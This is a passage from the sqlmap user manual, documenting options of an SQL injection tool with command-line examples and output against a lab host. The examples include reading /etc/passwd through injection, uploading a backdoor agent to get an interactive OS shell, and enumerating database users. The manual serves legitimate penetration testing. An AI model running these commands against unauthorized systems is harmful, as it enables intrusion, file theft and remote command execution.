|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" \
|
|
--read-file /etc/passwd
|
|
|
|
/etc/passwd:
|
|
---
|
|
root:x:0:0:root:/root:/bin/bash
|
|
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
|
bin:x:2:2:bin:/bin:/bin/sh
|
|
sys:x:3:3:sys:/dev:/bin/sh
|
|
sync:x:4:65534:sync:/bin:/bin/sync
|
|
games:x:5:60:games:/usr/games:/bin/sh
|
|
man:x:6:12:man:/var/cache/man:/bin/sh
|
|
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|
|
mail:x:8:8:mail:/var/mail:/bin/sh
|
|
news:x:9:9:news:/var/spool/news:/bin/sh
|
|
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|
|
proxy:x:13:13:proxy:/bin:/bin/sh
|
|
www-data:x:33:33:www-data:/var/www:/bin/false
|
|
backup:x:34:34:backup:/var/backups:/bin/sh
|
|
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|
|
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
|
|
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
|
|
inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
|
|
---
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect1>Operating system access
|
|
|
|
<sect2>Prompt for an interactive operating system shell
|
|
|
|
<p>
|
|
Option: <tt>--os-shell</tt>
|
|
|
|
<p>
|
|
If the back-end database management system is MySQL, the web application's
|
|
programming language is PHP and you, or sqlmap itself, found a writable
|
|
directory within the web server document root path, sqlmap can prompt for
|
|
an interactive operating system shell on the back-end database management
|
|
system.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" \
|
|
--os-shell
|
|
|
|
[hh:mm:49] [WARNING] unable to retrieve the injectable file absolute system path
|
|
[hh:mm:49] [WARNING] unable to retrieve the remote web server document root
|
|
[hh:mm:49] [INPUT] please provide the web server document root [/var/www]:
|
|
[hh:mm:53] [INPUT] please provide a list of directories absolute path comma separated that
|
|
you want sqlmap to try to upload the agent [/var/www/test]:
|
|
[hh:mm:55] [INPUT] do you want to use the uploaded backdoor as a shell to execute commands
|
|
right now? [Y/n] y
|
|
$ id
|
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
$ exit
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you might notice, such operating system shell has the same
|
|
functionalities of SQL shell.
|
|
|
|
|
|
<sect1>Miscellaneous
|
|
|
|
<sect2>Estimated time of arrival
|
|
|
|
<p>
|
|
Option: <tt>--eta</tt>
|
|
|
|
<p>
|
|
It is possible to calculate and show the estimated time of arrival to
|
|
retrieve each query output in real time while performing the SQL injection
|
|
attack.
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" -b \
|
|
--eta -v 1
|
|
|
|
[...]
|
|
back-end DBMS: Oracle
|
|
|
|
[hh:mm:24] [INFO] fetching banner
|
|
[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query
|
|
output again
|
|
[hh:mm:24] [INFO] retrieved the length of query output: 64
|
|
[hh:mm:24] [INFO] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version
|
|
WHERE ROWNUM=1
|
|
77% [=======================================> ] 49/64 ETA 00:00
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
then:
|
|
|
|
<tscreen><verb>
|
|
100% [====================================================] 64/64
|
|
[hh:mm:15] [INFO] performed 454 queries in 2 seconds
|
|
banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" \
|
|
--users --eta -v 1
|
|
|
|
[...]
|
|
back-end DBMS: Microsoft SQL Server 2000
|
|
|
|
[hh:mm:57] [INFO] fetching database users
|
|
[hh:mm:57] [INFO] fetching number of database users
|
|
[hh:mm:57] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)),
|
|
(CHAR(32))) FROM master..syslogins
|
|
[hh:mm:57] [INFO] retrieved: 3
|
|
[hh:mm:57] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:57] [INFO] retrieved the length of query output: 22
|
|
[hh:mm:57] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM
|
|
master..syslogins WHERE name NOT IN (SELECT TOP 0 name FROM master..syslogins ORDER BY name)
|
|
ORDER BY name
|
|
100% [====================================================] 22/22
|
|
[hh:mm:58] [INFO] performed 160 queries in 0 seconds
|
|
[hh:mm:58] [INFO] retrieved the length of query output: 2
|
|
[hh:mm:58] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM
|
|
master..syslogins WHERE name NOT IN (SELECT TOP 1 name FROM master..syslogins ORDER BY name)
|
|
ORDER BY name
|
|
100% [====================================================] 2/2
|
|
[hh:mm:59] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:59] [INFO] retrieved the length of query output: 25
|
|
[hh:mm:59] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM
|
|
master..syslogins WHERE name NOT IN (SELECT TOP 2 name FROM master..syslogins ORDER BY name)
|
|
ORDER BY name
|
|
100% [====================================================] 25/25
|
|
[hh:mm:00] [INFO] performed 181 queries in 1 seconds
|
|
database management system users [3]:
|
|
[*] BUILTIN\Administrators
|
|
[*] sa
|
|
[*] W2KITINQUIS\Administrator
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap first calculates the length of the query output,
|
|
then estimated the time of arrival, shows the progress in percentage and
|
|
counts the number of retrieved query output characters.
|
|
|
|
|
|
<sect2>Update sqlmap to the latest stable version
|
|
|
|
<p>
|
|
Option: <tt>--update</tt>
|
|
|
|
<p>
|
|
|
|
It is possible to update sqlmap to the latest stable version available on
|
|
its <htmlurl url="http://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107"
|
|
name="SourceForge File List page"> by running it with the
|
|
<tt>--update</tt> option.
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py --update -v 4
|
|
|
|
[hh:mm:53] [DEBUG] initializing the configuration
|
|
[hh:mm:53] [DEBUG] initializing the knowledge base
|
|
[hh:mm:53] [DEBUG] cleaning up configuration parameters
|
|
[hh:mm:53] [DEBUG] setting the HTTP method to perform HTTP requests through
|
|
[hh:mm:53] [DEBUG] creating HTTP requests opener object
|
|
[hh:mm:53] [INFO] updating sqlmap
|
|
[hh:mm:53] [DEBUG] checking if a new version is available
|
|
[hh:mm:55] [TRAFFIC OUT] HTTP request:
|
|
GET /doc/VERSION HTTP/1.1
|
|
Host: sqlmap.sourceforge.net
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Fri, 01 Aug 2008 14:50:55 GMT
|
|
Server: Apache/1.3.33 (Unix) PHP/4.3.10
|
|
Last-Modified: Thu, 31 Jul 2008 11:10:19 GMT
|
|
ETag: "9fcc53e-4-48919d9b"
|
|
Accept-Ranges: bytes
|
|
Content-Length: 4
|
|
Connection: close
|
|
Content-Type: text/plain
|
|
X-Pad: avoid browser bug
|
|
|
|
[hh:mm:55] [INFO] you are already running sqlmap latest stable version
|
|
[hh:mm:55] [INFO] updating Microsoft SQL Server XML versions file
|
|
[hh:mm:56] [TRAFFIC OUT] HTTP request:
|
|
GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1
|
|
Host: www.sqlsecurity.com
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0;
|
|
language=en-US
|
|
Connection: close
|
|
|
|
[hh:mm:02] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Cache-Control: private
|
|
Connection: close
|
|
Date: Fri, 01 Aug 2008 14:50:50 GMT
|
|
Content-Length: 167918
|
|
Content-Type: text/html; charset=utf-8
|
|
Server: Microsoft-IIS/6.0
|
|
X-Powered-By: ASP.NET
|
|
X-AspNet-Version: 2.0.50727
|
|
Set-Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0;
|
|
expires=Fri, 10-Oct-2008 01:30:49 GMT; path=/; HttpOnly
|
|
Set-Cookie: language=en-US; path=/; HttpOnly
|
|
|
|
[hh:mm:02] [INFO] no new Microsoft SQL Server versions since the last update
|
|
[hh:mm:02] [DEBUG] parsing XML queries file
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap first check if a new stable version is available,
|
|
then in case it is, download it, unzip it and update the Microsoft SQL
|
|
Server XML versions file from Chip Andrews'
|
|
<htmlurl url="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
|
name="SQLSecurity.com site">.
|
|
|
|
<p>
|
|
Note that the default configuration file <tt>sqlmap.conf</tt> is backupped
|
|
to <tt>sqlmap.conf.bak</tt> in case a new stable version is available and
|
|
your copy is updated.
|
|
|
|
|
|
<sect2>Save and resume all data retrieved on a session file
|
|
|
|
<p>
|
|
Option: <tt>-s</tt>
|
|
|
|
<p>
|
|
It is possible to log all queries and their output on a text file while
|
|
performing whatever request, both in blind SQL injection and in inband SQL
|
|
injection.
|
|
This is useful if you stop the injection and resume it after some time.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -b \
|
|
-v 1 -s "sqlmap.log"
|
|
|
|
[...]
|
|
back-end DBMS: PostgreSQL
|
|
|
|
[hh:mm:42] [INFO] fetching banner
|
|
[hh:mm:42] [INFO] query: COALESCE(CAST(VERSION() AS CHARACTER(10000)), (CHR(32)))
|
|
[hh:mm:42] [INFO] retrieved: PostgreSQL 8.2.7 o
|
|
[hh:mm:43] [ERROR] user aborted
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, I stopped the injection with <tt>CTRL-C</tt> while
|
|
retrieving the PostgreSQL banner and logged the session to text file
|
|
<tt>sqlmap.log</tt>.
|
|
|
|
<tscreen><verb>
|
|
$ cat sqlmap.log
|
|
|
|
[hh:mm:40 MM/DD/YY]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][Injection point][GET]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][Injection parameter][id]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][Injection type][numeric]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][Parenthesis][0]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][CONCAT('1', '1')][]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][LENGTH(SYSDATE)][]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][COALESCE(9, NULL)][9]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][LENGTH('9')][1]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][DBMS][PostgreSQL]
|
|
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1&cat=2][VERSION()][PostgreSQL 8.2.7 o
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, all queries performed and their output have been logged to
|
|
the session file in real time while performing the injection.
|
|
|
|
<p>
|
|
The session file has a structure as follows:
|
|
|
|
<tscreen><verb>
|
|
[hh:mm:ss MM/DD/YY]
|
|
[Target URL][Injection point][Parameters][Query or information name][Query output or value]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Performing the same request now, sqlmap calculates the query length,
|
|
in the example <tt>VERSION()</tt>, and resumes the injection from the last
|
|
character retrieved to the end of the query output.
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -b \
|
|
-v 1 -s "sqlmap.log"
|
|
|
|
[...]
|
|
back-end DBMS: PostgreSQL
|
|
|
|
[hh:mm:37] [INFO] fetching banner
|
|
[hh:mm:37] [INFO] retrieved the length of query output: 93
|
|
[hh:mm:37] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.2.7 o...
|
|
[hh:mm:37] [INFO] retrieving pending 75 query output characters
|
|
[hh:mm:37] [INFO] query: COALESCE(CAST(SUBSTR((VERSION()), 19, 93) AS CHARACTER(10000)),
|
|
(CHR(32)))
|
|
[hh:mm:37] [INFO] starting 1 threads
|
|
[hh:mm:37] [INFO] retrieved: n i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu
|
|
4.2.3-2ubuntu4)
|
|
banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu
|
|
4.2.3-2ubuntu4)'
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Load options from a configuration INI file
|
|
|
|
<p>
|
|
Option: <tt>-c</tt>
|
|
|
|
<p>
|
|
It is possible to pass user's option from a configuration INI file, an
|
|
example is <tt>sqlmap.conf</tt>.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -c "sqlmap.conf"
|
|
|
|
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Save options on a configuration INI file
|
|
|
|
<p>
|
|
Option: <tt>--save</tt>
|
|
|
|
<p>
|
|
It is possible to save the command line options to a configuration INI
|
|
file.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -b \
|
|
-v 1 --save
|
|
|
|
[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-ADMcR.conf'
|
|
configuration file
|
|
[hh:mm:33] [INFO] testing connection to the target url
|
|
[hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap saved the command line options to a configuration
|
|
INI file, <tt>sqlmap-ADMcR.conf</tt>.
|
|
|
|
<tscreen><verb>
|
|
$ cat sqlmap-ADMcR.conf
|
|
|
|
[Request]
|
|
aCred =
|
|
aType =
|
|
agent =
|
|
cookie =
|
|
data =
|
|
googleDork =
|
|
method = GET
|
|
proxy =
|
|
referer =
|
|
testParameter =
|
|
threads = 1
|
|
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2
|
|
userAgentsFile =
|
|
|
|
[Miscellaneous]
|
|
eta = False
|
|
sessionFile =
|
|
unionTest = False
|
|
unionUse = False
|
|
updateAll = False
|
|
verbose = 1
|
|
|
|
[Enumeration]
|
|
col =
|
|
db =
|
|
dumpAll = False
|
|
dumpTable = False
|
|
excludeSysDbs = False
|
|
getBanner = True
|
|
getColumns = False
|
|
getCurrentDb = False
|
|
getCurrentUser = False
|
|
getDbs = False
|
|
getPasswordHashes = False
|
|
getPrivileges = False
|
|
getTables = False
|
|
getUsers = False
|
|
query =
|
|
sqlShell = False
|
|
tbl =
|
|
user =
|
|
|
|
[File system]
|
|
rFile =
|
|
wFile =
|
|
|
|
[Takeover]
|
|
osShell = False
|
|
|
|
[Fingerprint]
|
|
extensiveFp = False
|
|
|
|
[Injection]
|
|
dbms =
|
|
string =
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
The file is a valid sqlmap configuration INI file.
|
|
You can edit the configuration options as you wish and pass it to sqlmap
|
|
with the <tt>-c</tt> option as explained in the previous paragraph:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -c "sqlmap-ADMcR.conf"
|
|
|
|
[...]
|
|
back-end DBMS: PostgreSQL
|
|
|
|
[hh:mm:10] [INFO] fetching banner
|
|
[hh:mm:10] [INFO] query: COALESCE(CAST(VERSION() AS CHARACTER(10000)), (CHR(32)))
|
|
[hh:mm:10] [INFO] retrieved: PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC)
|
|
4.2.3 (Ubuntu 4.2.3-2ubuntu4)
|
|
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
|
|
banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu
|
|
4.2.3-2ubuntu4)'
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Act in non-interactive mode
|
|
|
|
<p>
|
|
Option: <tt>--batch</tt>
|
|
|
|
<p>
|
|
If you want sqlmap to run as a batch tool, without interacting with you in
|
|
case of a choice has to be done, you can force it by using <tt>--batch</tt>
|
|
option than letting sqlmap go for a default behaviour.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" -v 1 \
|
|
--batch
|
|
|
|
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
|
|
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
|
|
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
|
|
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
|
|
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
|
|
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
|
|
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
|
|
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
|
|
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
|
|
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
|
|
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
|
|
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
|
|
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
|
|
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
|
|
[0] place: GET, parameter: id, type: numeric (default)
|
|
[1] place: GET, parameter: name, type: stringsingle
|
|
[q] Quit
|
|
Choice: 0
|
|
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
|
|
[...]
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap choosed automatically to injection on the first
|
|
vulnerable parameter which is the default behaviour.
|
|
|
|
|
|
<sect>Disclaimer
|
|
|
|
<p>
|
|
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
details.
|
|
|
|
<p>
|
|
Whatever you do with this tool is uniquely your responsability. If you are
|
|
not authorized to punch holes in the network you are attacking be aware
|
|
that such action might get you in trouble with a lot of law enforcement
|
|
agencies.
|
|
|
|
|
|
<sect>Authors
|
|
|
|
<p>
|
|
<itemize>
|
|
<item><htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G."> (inquis) - project leader, core developer. PGP Key ID: <htmlurl url="http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x05F5A30F" name="0x05F5A30F">
|
|
<item><htmlurl url="mailto:daniele.bellucci@gmail.com" name="Daniele Bellucci"> (belch) - project founder, initial developer. PGP Key ID: <htmlurl url="http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9A0E8190" name="0x9A0E8190">
|
|
</itemize>
|
|
|
|
|
|
</article>
|